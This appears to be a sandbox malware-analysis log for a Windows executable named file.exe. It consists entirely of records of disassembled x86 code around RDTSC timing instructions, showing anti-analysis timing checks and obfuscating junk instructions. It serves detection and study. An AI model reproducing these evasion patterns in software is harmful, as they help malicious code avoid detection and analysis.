Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A9527 second address: 12A95B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 06F38B7Ah 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F15490E9B88h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov ch, dh 0x0000002e mov ch, 09h 0x00000030 push 00000000h 0x00000032 mov esi, dword ptr [ebp+122D2C05h] 0x00000038 push 00000003h 0x0000003a add dword ptr [ebp+122D282Dh], edi 0x00000040 push BC9FD905h 0x00000045 pushad 0x00000046 push eax 0x00000047 pushad 0x00000048 popad 0x00000049 pop eax 0x0000004a push eax 0x0000004b push esi 0x0000004c pop esi 0x0000004d pop eax 0x0000004e popad 0x0000004f xor dword ptr [esp], 7C9FD905h 0x00000056 mov dword ptr [ebp+122D20CBh], ebx 0x0000005c lea ebx, dword ptr [ebp+1245B0C8h] 0x00000062 mov ch, bh 0x00000064 xchg eax, ebx 0x00000065 push ebx 0x00000066 jmp 00007F15490E9B8Bh 0x0000006b pop ebx 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jng 00007F15490E9B88h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A95B8 second address: 12A95BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CA254 second address: 12CA25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12CA25A second address: 12CA297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007F1548D0B2F6h 0x0000000e jns 00007F1548D0B2F6h 0x00000014 jmp 00007F1548D0B2FDh 0x00000019 popad 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1548D0B2FFh 0x00000022 pushad 0x00000023 jl 00007F1548D0B2F6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA297 second address: 12CA29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA29C second address: 12CA2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA582 second address: 12CA588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA588 second address: 12CA58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA58C second address: 12CA592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA592 second address: 12CA5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1548D0B304h 0x0000000c pop eax 0x0000000d je 00007F1548D0B2FEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CADEF second address: 12CADF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB0BB second address: 12CB0BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB0BF second address: 12CB0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB475 second address: 12CB479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB479 second address: 12CB483 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB483 second address: 12CB4B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1548D0B301h 0x00000008 jmp 00007F1548D0B2FFh 0x0000000d jc 00007F1548D0B2F6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB4B5 second address: 12CB4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB4B9 second address: 12CB509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B308h 0x00000007 jmp 00007F1548D0B305h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnc 00007F1548D0B2F6h 0x00000015 jmp 00007F1548D0B307h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB509 second address: 12CB510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBDA8 second address: 12CBDAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBF06 second address: 12CBF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8E4 second address: 12CE8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8E8 second address: 12CE8F6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8F6 second address: 12CE8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF18E second address: 12CF193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2AFD second address: 12D2B31 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1548D0B305h 0x00000008 jmp 00007F1548D0B308h 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12992B8 second address: 12992BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA48D second address: 12DA499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA499 second address: 12DA49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA49F second address: 12DA4A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA4A9 second address: 12DA4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA4B3 second address: 12DA4B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA4B7 second address: 12DA4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB3E6 second address: 12DB3F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB3F4 second address: 12DB3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB486 second address: 12DB4C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4B326C9Eh 0x00000010 call 00007F1548D0B302h 0x00000015 pop edi 0x00000016 push B893E400h 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007F1548D0B2F8h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB76F second address: 12DB779 instructions: 0x00000000 rdtsc 0x00000002 je 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB91B second address: 12DB937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1548D0B308h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB937 second address: 12DB955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBB18 second address: 12DBB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBB1D second address: 12DBB22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC06A second address: 12DC06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC2EA second address: 12DC2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC566 second address: 12DC56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC56A second address: 12DC57A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC57A second address: 12DC58B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1548D0B2F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC67C second address: 12DC697 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F15490E9B88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+12476244h] 0x00000015 xchg eax, ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC697 second address: 12DC69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC69B second address: 12DC6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15490E9B97h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE7F2 second address: 12DE800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD557 second address: 12DD56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15490E9B91h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE800 second address: 12DE80A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF3FB second address: 12DF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF405 second address: 12DF409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF409 second address: 12DF418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF418 second address: 12DF4A6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1548D0B2F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F1548D0B2F8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D29CDh] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F1548D0B2F8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D3071h], edx 0x0000004f push 00000000h 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007F1548D0B2F8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000014h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b sub esi, dword ptr [ebp+122D1BA8h] 0x00000071 xchg eax, ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 js 00007F1548D0B2FCh 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF4A6 second address: 12DF4AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE60 second address: 12DFEC6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e and edi, 64F61312h 0x00000014 push 00000000h 0x00000016 and edi, 2F45FF1Bh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F1548D0B2F8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 jmp 00007F1548D0B307h 0x0000003d mov esi, 64865E12h 0x00000042 xor dword ptr [ebp+122D28E9h], ecx 0x00000048 push eax 0x00000049 push ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFEC6 second address: 12DFECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E14B9 second address: 12E14BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E14BE second address: 12E1539 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F15490E9B86h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F15490E9B88h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D287Dh] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F15490E9B88h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 pushad 0x0000004a mov bh, 6Fh 0x0000004c mov dword ptr [ebp+122D333Fh], esi 0x00000052 popad 0x00000053 mov edi, ecx 0x00000055 push 00000000h 0x00000057 sub edi, dword ptr [ebp+1245BF52h] 0x0000005d jmp 00007F15490E9B8Eh 0x00000062 xchg eax, ebx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 jp 00007F15490E9B86h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1539 second address: 12E1543 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1543 second address: 12E1571 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jne 00007F15490E9B88h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F15490E9B97h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3ECA second address: 12E3ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3ECF second address: 12E3EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F15490E9B8Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c jns 00007F15490E9B86h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E552C second address: 12E5556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B305h 0x00000007 jl 00007F1548D0B2FCh 0x0000000d jc 00007F1548D0B2F6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5556 second address: 12E555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1DD4 second address: 12E1DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E555C second address: 12E556C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B8Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E556C second address: 12E5571 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5571 second address: 12E557F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F15490E9B86h 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927AF second address: 12927B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927B5 second address: 12927D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F15490E9B94h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927D0 second address: 12927D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927D5 second address: 12927DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927DE second address: 12927E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927E4 second address: 12927E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7A4C second address: 12E7A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1548D0B309h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F1548D0B2F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8010 second address: 12E8014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8014 second address: 12E801E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E902C second address: 12E90AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F15490E9B88h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D29B9h] 0x0000002d mov dword ptr [ebp+122D2301h], ebx 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+1245BF45h] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007F15490E9B88h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 0000001Ah 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 mov ebx, 10DE9079h 0x0000005c pushad 0x0000005d xor bh, 00000028h 0x00000060 adc ah, FFFFFFFEh 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E90AC second address: 12E90C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jne 00007F1548D0B2F6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f jnc 00007F1548D0B2FEh 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E82E6 second address: 12E82EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
